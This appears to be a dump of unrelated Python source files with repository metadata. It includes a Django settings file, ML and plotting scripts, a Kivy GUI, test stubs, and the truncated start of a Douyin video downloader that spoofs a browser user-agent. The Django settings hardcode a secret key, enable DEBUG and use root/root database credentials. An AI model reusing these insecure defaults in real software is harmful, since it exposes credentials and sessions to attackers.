SECRET_KEY = 'z5)=jv1ho$%@891l#l)x47*zq@4*!0$v07fk@srtz+2)rps^3j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'home',
'dashboard',
'core',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'standupmeeting.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'standupmeeting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'standupmeeting',
'USER': 'root',
'PASSWORD': 'root',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
) | [
"codyowl@gmail.com"
] | codyowl@gmail.com |
1b6a2aa29c25d01d109682bef2c4e146e7d3ae9a | 7b4cc3814338b600db560324e615cf5c3a02bff5 | /test/test_inline_response20019_ranks_sum.py | 7c843351bb5fea0cf90e0166453b3ff6628bd10a | [] | no_license | wood-run/opendota-client | 58ea278c94d3edad0daf695438d5ec2a3d90fe08 | 2cd7defca67c7efde4ee414e9dcd8685245cd167 | refs/heads/master | 2022-12-29T02:17:26.862289 | 2020-10-13T08:29:06 | 2020-10-13T08:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. You can find data that can be used to convert hero and ability IDs and other information provided by the API from the [dotaconstants](https://github.com/odota/dotaconstants) repository. **Beginning 2018-04-22, the OpenDota API is limited to 50,000 free calls per month and 60 requests/minute** We offer a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more. # noqa: E501
OpenAPI spec version: 18.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import opendota_client
from opendota_client.models.inline_response20019_ranks_sum import InlineResponse20019RanksSum # noqa: E501
from opendota_client.rest import ApiException
class TestInlineResponse20019RanksSum(unittest.TestCase):
"""InlineResponse20019RanksSum unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineResponse20019RanksSum(self):
"""Test InlineResponse20019RanksSum"""
# FIXME: construct object with mandatory attributes with example values
# model = opendota_client.models.inline_response20019_ranks_sum.InlineResponse20019RanksSum() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"chujiyang@gmail.com"
] | chujiyang@gmail.com |
88eaf22c767ec5d231450ea9686ec6949a2023e5 | a9760e9fe6d81cfeb76044a43008eee2adf0295b | /choose_your_own/your_algorithm.py | eea887add072af15e85eb41e6eb922be2fbe7319 | [] | no_license | Valentine-Mario/Machine-learning | 9ff39e33fe6dc4a4e88efaa03b3f36ebbd3aeacc | 6a4261830057f104adbcff67c5e131707e124735 | refs/heads/master | 2022-07-18T17:37:44.582421 | 2020-02-03T18:14:14 | 2020-02-03T18:14:14 | 223,941,245 | 0 | 0 | null | 2022-06-21T23:32:48 | 2019-11-25T12:15:51 | DIGITAL Command Language | UTF-8 | Python | false | false | 2,084 | py | #!/usr/bin/python
import matplotlib.pyplot as plt
from prep_terrain_data import makeTerrainData
from class_vis import prettyPicture
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
features_train, labels_train, features_test, labels_test = makeTerrainData()
### the training data (features_train, labels_train) have both "fast" and "slow"
### points mixed together--separate them so we can give them different colors
### in the scatterplot and identify them visually
grade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]
bumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]
grade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]
bumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]
#### initial visualization
plt.xlim(0.0, 1.0)
plt.ylim(0.0, 1.0)
plt.scatter(bumpy_fast, grade_fast, color = "b", label="fast")
plt.scatter(grade_slow, bumpy_slow, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.show()
################################################################################
### your code here! name your classifier object clf if you want the
### visualization code (prettyPicture) to show you the decision boundary
#for knn
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(features_train, labels_train)
predict= clf.predict(features_test)
#adaboost
# clf = AdaBoostClassifier(n_estimators=100, random_state=0)
# clf.fit(features_train, labels_train)
# predict=clf.predict(features_test)
#random forest
# clf = RandomForestClassifier(max_depth=2, random_state=0)
# clf.fit(features_train, labels_train)
# predict=clf.predict(features_test)
accuracy=accuracy_score(predict, labels_test)
print(accuracy)
try:
prettyPicture(clf, features_test, labels_test)
except NameError:
pass
| [
"valentine13400@gmail.com"
] | valentine13400@gmail.com |
75a51dcedafba4f54f170bc433e959f80f46a919 | 61e98b0302a43ab685be4c255b4ecf2979db55b6 | /sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/functional/too_many_nested_blocks.py | 47dbf441bd71b32547d4d652a501a6d3189ff396 | [
"BSD-3-Clause",
"EPL-2.0",
"CDDL-1.0",
"Apache-2.0",
"WTFPL",
"GPL-2.0-only",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"CDDL-1.1",
"Classpath-exception-2.0"
] | permissive | dzenyu/kafka | 5631c05a6de6e288baeb8955bdddf2ff60ec2a0e | d69a24bce8d108f43376271f89ecc3b81c7b6622 | refs/heads/master | 2021-07-16T12:31:09.623509 | 2021-06-28T18:22:16 | 2021-06-28T18:22:16 | 198,724,535 | 0 | 0 | Apache-2.0 | 2019-07-24T23:51:47 | 2019-07-24T23:51:46 | null | UTF-8 | Python | false | false | 2,259 | py | """Checks the maximum block level is smaller than 6 in function definitions"""
#pylint: disable=using-constant-test, missing-docstring, too-many-return-statements
def my_function():
if 1: # [too-many-nested-blocks]
for i in range(10):
if i == 2:
while True:
try:
if True:
i += 1
except IOError:
pass
if 1:
for i in range(10):
if i == 2:
while True:
try:
i += 1
except IOError:
pass
def nested_func():
if True:
for i in range(10):
while True:
if True:
if True:
yield i
nested_func()
def more_complex_function():
attr1 = attr2 = attr3 = [1, 2, 3]
if attr1:
for i in attr1:
if attr2:
return i
else:
return 'duh'
elif attr2:
for i in attr2:
if attr2:
return i
else:
return 'duh'
else:
for i in range(15):
if attr3:
return i
else:
return 'doh'
return None
def elif_function():
arg = None
if arg == 1:
return 1
elif arg == 2:
return 2
elif arg == 3:
return 3
elif arg == 4:
return 4
elif arg == 5:
return 5
elif arg == 6:
return 6
elif arg == 7:
return 7
def else_if_function():
arg = None
if arg == 1: # [too-many-nested-blocks]
return 1
else:
if arg == 2:
return 2
else:
if arg == 3:
return 3
else:
if arg == 4:
return 4
else:
if arg == 5:
return 5
else:
if arg == 6:
return 6
else:
if arg == 7:
return 7
| [
"alex.barreto@databricks.com"
] | alex.barreto@databricks.com |
c9d7473a10ec6484bfb9f69df952c0a761dd359d | 7624e2cab8bcd6b7cf1d9b5c611610f7ca050dac | /internbot/view/topline_view/appendix_view.py | 20d0c7d8e6f100d9f1a28b3051769b7a63a921d8 | [] | no_license | carolinedarling/internbot | 95aaaad81f81cbbbea2f7a04a6ff819f222290df | beebc0e168e405e246392ebf91f3b01562878728 | refs/heads/master | 2022-04-01T03:14:59.929299 | 2019-12-11T18:25:02 | 2019-12-11T18:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,141 | py | ## outside modules
import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import Image
from kivy.graphics import Color, Rectangle
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.core.text import LabelBase
from kivy.uix.textinput import TextInput
from kivy.uix.filechooser import FileChooserListView, FileChooserIconView
import webbrowser
import os
class AppendixView(BoxLayout):
def __init__(self, **kwargs):
super(AppendixView, self).__init__(**kwargs)
self.__is_doc_report = True
self.__is_qualtrics = False
self.open_file_prompt = self.create_open_file_prompt()
self.open_file_dialog = self.create_open_file_dialog()
self.report_selector = self.create_report_selector()
self.document_format_selector = self.create_document_format_selector()
self.spreadsheet_format_selector = self.create_spreadsheet_format_selector()
self.other_template_dialog = self.create_other_template_dialog()
self.save_file_prompt = self.create_save_file_prompt()
def create_open_file_prompt(self):
popup_layout = BoxLayout(orientation='vertical')
help_text = "Choose labelled appendix verbatims (.csv) file\n\n"
help_text += "[ref=click][color=F3993D]Click here for examples of verbatim files[/color][/ref]"
def examples_link(instance, value):
webbrowser.open("https://www.dropbox.com/sh/tmg33zeh71sb71k/AAB5tpanqADX96yB3VL5yLw_a?dl=0")
label = Label(text=help_text, markup=True)
label.bind(on_ref_press=examples_link)
label.font_family= "Y2"
popup_layout.add_widget(label)
save_btn = Button(text='>', size_hint=(.2,.2))
save_btn.pos_hint={'center_x': 0.5, 'center_y': 0.5}
save_btn.bind(on_release=self.open_file_prompt_to_dialog)
popup_layout.add_widget(save_btn)
popup = Popup(title="Select appendix file",
content=popup_layout,
size_hint=(.7, .5), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return popup
def create_open_file_dialog(self):
chooser = BoxLayout()
container = BoxLayout(orientation='vertical')
def open_file(path, filename):
try:
filepath = os.path.join(path, filename[0])
self.__open_filename = filepath
self.open_file_dialog_to_report_selector()
except IndexError:
self.error_message("Please pick an appendix (.csv) file")
filechooser = FileChooserListView()
filechooser.path = os.path.expanduser("~")
filechooser.bind(on_selection=lambda x: filechooser.selection)
filechooser.filters = ["*.csv"]
open_btn = Button(text='open', size_hint=(.2,.1), pos_hint={'center_x': 0.5, 'center_y': 0.5})
open_btn.bind(on_release=lambda x: open_file(filechooser.path, filechooser.selection))
container.add_widget(filechooser)
container.add_widget(open_btn)
chooser.add_widget(container)
file_chooser = Popup(title='Open file',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return file_chooser
def create_report_selector(self):
chooser = BoxLayout(orientation='vertical')
help_text = "Choose from the following report options\n\n"
help_text += "[ref=click][color=F3993D]Click here for examples of report formats[/color][/ref]"
def examples_link(instance, value):
webbrowser.open("https://www.dropbox.com/sh/pcpgh1uin5lzt3w/AABHLm6f_bKzh_RIWqslqFKSa?dl=0")
label = Label(text=help_text, markup=True)
label.bind(on_ref_press=examples_link)
label.font_family= "Y2"
chooser.add_widget(label)
button_layout = BoxLayout()
button_layout.size_hint = (1, .1)
doc_btn = Button(text="Document", on_press=self.is_doc)
spr_btn = Button(text="Spreadsheet", on_press=self.is_sheet)
button_layout.add_widget(doc_btn)
button_layout.add_widget(spr_btn)
chooser.add_widget(button_layout)
report_chooser = Popup(title='Choose format',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return report_chooser
def create_document_format_selector(self):
chooser = BoxLayout(orientation='vertical')
text = "Choose from the following format options."
label = Label(text=text)
label.font_family = "Y2"
chooser.add_widget(label)
button_layout = BoxLayout()
button_layout.size_hint = (1, .1)
policy_btn = Button(text="Utah Policy", on_press=self.is_policy)
y2_btn = Button(text="Y2 Analytics", on_press=self.is_y2)
oth_btn = Button(text="Other", on_press=self.is_other)
button_layout.add_widget(policy_btn)
button_layout.add_widget(y2_btn)
button_layout.add_widget(oth_btn)
chooser.add_widget(button_layout)
format_chooser = Popup(title='Choose format',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return format_chooser
def create_spreadsheet_format_selector(self):
chooser = BoxLayout(orientation='vertical')
text = "Choose from the following format options."
label = Label(text=text)
label.font_family = "Y2"
chooser.add_widget(label)
button_layout = BoxLayout()
button_layout.size_hint = (1, .1)
qualtrics_btn = Button(text="Qualtrics", on_press=self.is_qualtrics)
policy_btn = Button(text="Utah Policy", on_press=self.is_policy)
y2_btn = Button(text="Y2 Analytics", on_press=self.is_y2)
button_layout.add_widget(qualtrics_btn)
button_layout.add_widget(policy_btn)
button_layout.add_widget(y2_btn)
chooser.add_widget(button_layout)
format_chooser = Popup(title='Choose format',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return format_chooser
def create_other_template_dialog(self):
chooser = BoxLayout()
container = BoxLayout(orientation='vertical')
def open_file(path, filename):
try:
filepath = os.path.join(path, filename[0])
self.__template_file_path = filepath
self.other_template_dialog_to_save()
except IndexError:
self.error_message("Please select a template document (.docx) file")
filechooser = FileChooserListView()
filechooser.path = os.path.expanduser("~")
filechooser.bind(on_selection=lambda x: filechooser.selection)
filechooser.filters = ["*.docx"]
open_btn = Button(text='open', size_hint=(.2,.1), pos_hint={'center_x': 0.5, 'center_y': 0.5})
open_btn.bind(on_release=lambda x: open_file(filechooser.path, filechooser.selection))
container.add_widget(filechooser)
container.add_widget(open_btn)
chooser.add_widget(container)
file_chooser = Popup(title='Open file',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return file_chooser
def create_save_file_prompt(self):
popup_layout = BoxLayout(orientation='vertical')
label = Label(text="Choose a file location and name for topline appendix report")
label.font_family= "Y2"
popup_layout.add_widget(label)
save_btn = Button(text='>', size_hint=(.2,.2))
save_btn.pos_hint={'center_x': 0.5, 'center_y': 0.5}
save_btn.bind(on_release=self.save_file_prompt_to_dialog)
popup_layout.add_widget(save_btn)
popup = Popup(title="Select save file location",
content=popup_layout,
size_hint=(.7, .5), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return popup
def create_save_file_dialog(self):
chooser = BoxLayout()
container = BoxLayout(orientation='vertical')
filechooser = FileChooserIconView()
filechooser.path = os.path.expanduser("~")
container.add_widget(filechooser)
def save_file(path, filename):
filepath = os.path.join(path, filename)
path, ext = os.path.splitext(filepath)
if ext != ".xlsx" and ext != ".docx":
if self.__is_doc_report:
filepath += ".docx"
else:
filepath += ".xlsx"
self.__save_filename = filepath
self.finish()
button_layout = BoxLayout()
button_layout.size_hint = (1, .1)
if self.__is_doc_report:
file_default = "File name.docx"
else:
file_default = "File name.xlsx"
file_name = TextInput(text=file_default)
button_layout.add_widget(file_name)
save_btn = Button(text='save', size_hint=(.2,1))
save_btn.bind(on_release=lambda x: save_file(filechooser.path, file_name.text))
button_layout.add_widget(save_btn)
container.add_widget(button_layout)
chooser.add_widget(container)
file_chooser = Popup(title='Save report',
content=chooser,
size_hint=(.9, .7 ), pos_hint={'center_x': 0.5, 'center_y': 0.5})
return file_chooser
def run(self, controller):
self.__template_file_path = None
self.__controller = controller
self.open_file_prompt.open()
def open_file_prompt_to_dialog(self, instance):
self.open_file_prompt.dismiss()
self.open_file_dialog.open()
def open_file_dialog_to_report_selector(self):
self.open_file_dialog.dismiss()
try:
self.__controller.build_appendix_model(self.__open_filename)
self.report_selector.open()
except:
self.error_message("Error reading in data file.")
def is_doc(self, instance):
self.report_selector.dismiss()
self.document_format_selector.open()
def is_sheet(self, instance):
self.__is_doc_report = False
self.report_selector.dismiss()
self.spreadsheet_format_selector.open()
def is_qualtrics(self, instance):
self.__template_name = "QUALTRICS"
self.document_format_selector.dismiss()
self.spreadsheet_format_selector.dismiss()
self.save_file_prompt.open()
def is_y2(self, instance):
self.__template_name = "Y2"
self.document_format_selector.dismiss()
self.spreadsheet_format_selector.dismiss()
self.save_file_prompt.open()
def is_policy(self, instance):
self.__template_name = "UT_POLICY"
self.document_format_selector.dismiss()
self.spreadsheet_format_selector.dismiss()
self.save_file_prompt.open()
def is_other(self, instance):
self.__template_name = "OTHER"
self.document_format_selector.dismiss()
self.spreadsheet_format_selector.dismiss()
self.other_template_dialog.open()
def other_template_dialog_to_save(self):
self.other_template_dialog.dismiss()
self.save_file_prompt.open()
def save_file_prompt_to_dialog(self, instance):
self.save_file_prompt.dismiss()
self.save_file_dialog = self.create_save_file_dialog()
self.save_file_dialog.open()
def finish(self):
self.save_file_dialog.dismiss()
#try:
self.__controller.build_appendix_report(self.__save_filename, self.__is_doc_report, self.__template_name, self.__template_file_path)
# except:
# self.error_message("Error formatting appendix report.")
def error_message(self, error):
label = Label(text=error)
label.font_family= "Y2"
popup = Popup(title="Something Went Wrong",
content=label,
size_hint=(.5, .8), pos_hint={'center_x': 0.5, 'center_y': 0.5})
popup.open()
| [
"kathryn@y2analytics.com"
] | kathryn@y2analytics.com |
e36f731f026dc6e0c20ae3cf067138808c6531d2 | 4bd1f3407a7b9d456034f62b71354d94778b7f54 | /plots_regression.py | ec256e9fc1e4149d5600c0487a77a24ed14ea7cb | [] | no_license | mgmrussell/applied-ai-msc | f2287efc51e80cb5d2a335133b60088c39859d47 | 31f6b3add6fa6cb31af737cafc451f146cc23445 | refs/heads/main | 2023-08-16T03:23:37.334422 | 2021-09-17T12:14:28 | 2021-09-17T12:14:28 | 407,523,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,076 | py | from matplotlib.colors import ListedColormap
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
import constant
import numpy as np
def initialize_data():
result_df = pd.read_csv('reg_result0p2.csv')
std = pd.read_csv('reg_data_y_std.csv')
stds = {}
for _, row in std.iterrows():
stds[row[0]] = row[1]
result_df['target_std'] = result_df.apply(lambda x: stds[x['dataset']], axis=1)
result_df['mse_test_by_train'] = result_df['mse_test']/result_df['mse_train']
result_df['unscaled_mse_train'] = result_df['mse_train']*result_df['target_std']*result_df['target_std']
result_df['unscaled_mse_test'] = result_df['mse_test']*result_df['target_std']*result_df['target_std']
result_df['r_mse_train'] = result_df.apply(lambda x: np.sqrt(x['mse_train']), axis=1)
result_df['r_mse_test'] = result_df.apply(lambda x: np.sqrt(x['mse_test']), axis=1)
result_df['ds'] = result_df.apply(lambda x: x['dataset'].split('(')[1].split(')')[0], axis=1)
return result_df
def get_confidence_percent(t_value, df):
sign = 1
if (t_value < 0):
sign = -1
t_value = -t_value
cis = np.linspace(0, 100, 101)
del_t = 100
answer = 0
for ci in cis:
ti = stats.t.ppf(1 - ci/100/2, 40)
if abs(ti - t_value) < del_t:
answer = 100 - ci
del_t = abs(ti - t_value)
return -sign*answer
def confidence_interval(name):
# confidence_interval based on accuracy_test
cols = [e.name for e in constant.Regression]
confidence_interval = pd.DataFrame([], columns=cols)
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
for e1 in constant.Regression:
d = {}
for e2 in constant.Regression:
e1_des = result_df.loc[(result_df['group'] == e1.name)][name].describe()
e2_des = result_df.loc[(result_df['group'] == e2.name)][name].describe()
t_value = (e1_des[1] - e2_des[1]) / np.sqrt(e1_des[2]*e1_des[2]/e1_des[0] + e2_des[2]*e2_des[2]/e2_des[0])
n = len(result_df.loc[(result_df['group'] == e1.name)][name])
d[e2.name] = [get_confidence_percent(t_value, 2*n - 2)]
confidence_interval = pd.concat([confidence_interval, pd.DataFrame(data=d, index=[e1.name])])
return confidence_interval
def accuracy(name):
cols = [e.name for e in constant.Regression]
mse = pd.DataFrame([], columns=cols)
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
datasets = result_df['ds'].unique()
datasets.sort()
for ds in datasets:
ds_df = result_df.loc[(result_df['ds'] == ds)]
d = {}
for _, row in ds_df.iterrows():
accuracy = row[name]
algo = row['group']
d[algo] = accuracy
mse = pd.concat([mse, pd.DataFrame(data=d, index=[ds])])
# mse = mse.sort_values(dataset, ascending=False)
return mse
def compare_lms(ylabel='', column='', ax=None):
if ax:
g = sns.boxplot(x='group', y=column, data=result_df, showmeans=True, ax=ax)
sns.stripplot(x='group', y=column, data=result_df, color="navy", jitter=0.05, size=2.0, ax=ax)
else:
sns.stripplot(x='group', y=column, data=result_df, color="navy", jitter=0.05, size=2.0)
g = sns.boxplot(x='group', y=column, data=result_df, showmeans=True, ax=ax)
plt.title("", loc="left")
ax.set_xlabel('')
ax.set_ylabel(ylabel, size=14)
# ax.tick_params(axis='y', labelsize=13)
# ax.tick_params(axis='x', labelsize=13)
return g
# Plot r2_test and r2_train
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
r2_test = accuracy('r2_test')
r2_train = accuracy('r2_train')
g1 = sns.heatmap(r2_test, cmap='bone', fmt='.3f', linewidths=0.5, annot=r2_test, cbar=False, ax=ax1)
g2 = sns.heatmap(r2_train, cmap='bone', fmt='.3f', linewidths=0.5, annot=r2_train, cbar=False, ax=ax2)
for ax in [g1, g2]:
tl = ax.get_xticklabels()
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
ax.set_xticklabels(tl, rotation=0)
plt.show()
# Plot mse_test and mse_test/mse_train
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
mse_test = accuracy('mse_test')
mse_test_by_train = accuracy('mse_test_by_train')
g1 = sns.heatmap(mse_test, cmap='bone_r', fmt='.3f', linewidths=0.5, annot=mse_test, cbar=False, ax=ax1)
g2 = sns.heatmap(mse_test_by_train, cmap='bone_r', linewidths=0.5,
annot=mse_test_by_train, linecolor='gray', cbar=False, ax=ax2)
for ax in [g1, g2]:
tl = ax.get_xticklabels()
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
ax.set_xticklabels(tl, rotation=0)
plt.show()
# confidence_interval
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
confidence_interval_test = confidence_interval('r_mse_test')
# print(confidence_interval_test)
confidence_interval_train = confidence_interval('r_mse_train')
# print(confidence_interval_train)
g1 = sns.heatmap(confidence_interval_test, cmap='bone',
annot=confidence_interval_test, cbar=False, ax=ax1)
g2 = sns.heatmap(confidence_interval_train, cmap='bone',
annot=confidence_interval_train, cbar=False, ax=ax2)
for t in g1.texts:
t.set_text(t.get_text() + "%")
for t in g2.texts:
t.set_text(t.get_text() + "%")
for ax in [g1, g2]:
tl = ax.get_xticklabels()
ax.set_xticklabels(tl, rotation=0)
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
tly = ax.get_yticklabels()
ax.set_yticklabels(tly, rotation=0)
plt.show()
# Scaling to Big Data
time_result = pd.read_csv('reg_time_model.csv')
ns = np.log10(np.logspace(2, 8, 20))
d = np.log10(1000)
time = {}
for group in time_result.index:
logn = time_result.loc[(time_result.index == group)]['log(n)'][group]
logd = time_result.loc[(time_result.index == group)]['log(d)'][group]
Intercept = time_result.loc[(time_result.index == group)]['Intercept'][group]
time[group] = (logn*ns + logd*d + Intercept)
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
sns.heatmap(time_result, fmt='.2f', cmap=ListedColormap(['white']), linewidths=0.5,
linecolor='gray', cbar=False, annot=time_result, ax=ax1)
ax1.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
for group in time_result.index:
ax2.plot(ns, time[group], '.-', label=group)
ax2.text(3.5, 9, r'$d$ = ' + str(int(10 ** d)))
ax2.set_xlabel(r'$log_{10}(n)$')
ax2.set_ylabel(r'$log_{10}(time)$')
ax2.legend()
plt.show()
# Bias Variance
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
# result_df = result_df.loc[(result_df['group'] != 'OLS')]
result_df = result_df.loc[(result_df['dataset'] != 'Automobile (AM)')]
g1 = compare_lms(ylabel=r'Bias Error', column='bias', ax=ax1)
g2 = compare_lms(ylabel=r'Variance Error', column='variance', ax=ax2)
plt.show()
# heatmap Bias Variance
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
bias = accuracy('bias')
variance = accuracy('variance')
g1 = sns.heatmap(bias, cmap='bone_r', linewidths=0.5, annot=bias, linecolor='gray', cbar=False, ax=ax1)
g2 = sns.heatmap(variance, cmap='bone_r', linewidths=0.5,
annot=variance, linecolor='gray', cbar=False, ax=ax2)
for ax in [g1, g2]:
tl = ax.get_xticklabels()
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
ax.set_xticklabels(tl, rotation=0)
plt.show()
# Some Average Properties
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
result_df['Regressors'] = result_df['group']
result_df = result_df.drop('group', axis=1)
new = result_df.groupby(['Regressors']).mean()
new['R2 Test'] = new['r2_test']
new['R2 Train'] = new['r2_train']
new['MSE Test'] = new['mse_test']
new['MSE Train'] = new['mse_train']
new['CV-Score'] = new['avg_csv']
new['Bias'] = new['bias']
new['Variance'] = new['variance']
new['Training Time (s)'] = new['t_time']
new = new.drop(['r2_train', 'r2_test', 'bias', 'variance', 't_time', 'c_time',
'avg_csv', 'min_csv', 'max_csv', 'feat_imp', 'ts',
'mse_train', 'mse_test', 'coeffs', 'alpha', 'l1_ratio', 'gamma', 'C',
'target_std', 'mse_test_by_train', 'unscaled_mse_train',
'unscaled_mse_test', 'r_mse_train', 'r_mse_test'], axis=1)
new = new.sort_values('R2 Test', ascending=False)
ax = sns.heatmap(new, cmap=ListedColormap(['white']),
linewidths=0.5, linecolor='gray', cbar=False, annot=new)
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
tl = ax.get_xticklabels()
ax.set_xticklabels(tl, rotation=0)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
2b264b55b123a8cd5b282f6bb7e18cab92f2e684 | e533a0ed04ef500d394d2a36131214109fd09925 | /test_04_11_4.py | e7eabac535b0302c5edab0f859e6061f397171c5 | [] | no_license | rocmc/Python_edu_171216 | 03a20ada87fbb6af00794d44b1c677840b95fdeb | f704211c96d75bef0a8b26c1d91227076b2f73ca | refs/heads/master | 2021-03-19T15:38:59.719369 | 2017-12-23T08:16:20 | 2017-12-23T08:16:20 | 114,445,355 | 0 | 0 | null | null | null | null | UHC | Python | false | false | 427 | py | #coding: euc-kr
import sqlite3
db = sqlite3.connect("test.db")
cursor = db.cursor()
# 삭제 SQL
cursor.execute("""DELETE
FROM PHONEBOOK
WHERE EMAIL=?""",
("visual@naver.com",))
# 반드시 커밋을 한다
db.commit()
cursor.execute("""SELECT NAME, PHONE, EMAIL
FROM PHONEBOOK""")
rows = cursor.fetchall()
print(rows)
cursor.close()
db.close()
| [
"corea811@gmail.com"
] | corea811@gmail.com |
3a7267565f9ff70b2e81cefb0c86b27fd8f3b565 | f62007cbfe69b169bc6fac79c143856e027af46c | /Day1/length.py | 5c774bd03af217463c727630ea0a611cebc618b9 | [] | no_license | nithishkumar98/100-days-of-python | 272bff29d85cf99a54358fe79ab44fe63ea0870a | def3089ab482a70a2cc12fad28ef65bc6de6a6be | refs/heads/master | 2023-06-25T00:42:33.873203 | 2021-07-20T18:19:30 | 2021-07-20T18:19:30 | 386,530,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | name = input("What is your name?")
length = (len(name))
print("The length of the "+name+" is " + str(length))
| [
"nithishindians@gmail.com"
] | nithishindians@gmail.com |
17ed53f882b6351a4dfc34a6cd9a6c7e3bcc5816 | 95d7e59587cbe49e9b2cd54b9b7d1d7bd0e2d73a | /爬虫/code/抖音无水印下载.py | d4a779d2b6f2cd73d286ed8c633db581ce8bcd63 | [
"MIT"
] | permissive | oncesimple/heima_python_learn | ddba1428c52cd3029019aad085ff79e8b0ebed0e | e4a2ff7e4f95ed910d54888d6ed79b315d0f148b | refs/heads/master | 2023-03-29T08:17:17.476068 | 2021-04-10T10:17:39 | 2021-04-10T10:17:39 | 356,540,341 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
__author__ = 'hyh'
__date__ = '2020/7/4 21:07'
import re
import requests
"""
TODO 声明
脚本仅仅提供学习使用,拿来盗别人视频,或者商业用途,后果自负作者不会承担任何责任。。
"""
def request(url):
headers = {
"user-agent": "Mozilla/5.0 (Linux; Android 5.0; SM-N9100 Build/LRX21V) > AppleWebKit/537.36 (KHTML, "
"like Gecko) Version/4.0 > Chrome/37.0.0.0 Mobile Safari/537.36 > "
"MicroMessenger/6.0.2.56_r958800.520 NetType/WIFI",
}
response = requests.get(url, headers=headers)
return response
def main():
url = input('请输入抖音视频链接:')
new_url = request(re.findall("(http.*/)", url)[0]).url
